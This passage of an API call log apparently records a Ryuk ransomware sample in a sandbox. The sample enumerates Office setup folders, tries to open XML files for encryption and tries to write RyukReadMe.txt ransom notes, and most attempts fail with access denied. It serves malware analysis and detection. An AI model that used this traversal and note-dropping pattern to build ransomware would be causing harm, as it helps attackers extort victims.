dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.763] GetLastError () returned 0x5 [0131.763] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.764] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.764] SetLastError (dwErrCode=0x0) [0131.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.764] GetLastError () returned 0x5 [0131.764] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.764] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.765] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.765] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML", dwFileAttributes=0x80) returned 0 [0131.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.766] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.767] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.767] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.767] SetLastError (dwErrCode=0x0) [0131.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.767] GetLastError () returned 0x5 [0131.767] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.767] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.767] SetLastError (dwErrCode=0x0) [0131.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.768] GetLastError () returned 0x5 [0131.768] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.769] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.769] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML", dwFileAttributes=0x80) returned 0 [0131.769] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.770] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.771] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.771] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.771] SetLastError (dwErrCode=0x0) [0131.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.771] GetLastError () returned 0x5 [0131.771] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.771] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.771] SetLastError (dwErrCode=0x0) [0131.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.772] GetLastError () returned 0x5 [0131.772] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.772] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.772] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML", dwFileAttributes=0x80) returned 0 [0131.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.773] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.773] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.773] SetLastError (dwErrCode=0x0) [0131.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.773] GetLastError () returned 0x5 [0131.773] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.773] SetLastError (dwErrCode=0x0) [0131.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.773] GetLastError () returned 0x5 [0131.773] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.774] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.774] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.774] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML", dwFileAttributes=0x80) returned 0 [0131.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.775] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.775] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.775] SetLastError (dwErrCode=0x0) [0131.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.775] GetLastError () returned 0x5 [0131.776] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.776] SetLastError (dwErrCode=0x0) [0131.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.776] GetLastError () returned 0x5 [0131.776] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.776] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.776] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.776] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML", dwFileAttributes=0x80) returned 0 [0131.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.777] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.777] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.777] SetLastError (dwErrCode=0x0) [0131.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.777] GetLastError () returned 0x5 [0131.777] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.777] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.777] SetLastError (dwErrCode=0x0) [0131.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.778] GetLastError () returned 0x5 [0131.778] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.778] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.778] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.778] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML", dwFileAttributes=0x80) returned 0 [0131.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.779] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.779] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.779] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.780] SetLastError (dwErrCode=0x0) [0131.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.780] GetLastError () returned 0x5 [0131.780] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.780] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.780] SetLastError (dwErrCode=0x0) [0131.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.780] GetLastError () returned 0x5 [0131.780] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.780] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.781] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.781] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.781] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML", dwFileAttributes=0x80) returned 0 [0131.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.782] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.782] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.782] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.782] SetLastError (dwErrCode=0x0) [0131.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.783] GetLastError () returned 0x5 [0131.783] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.783] 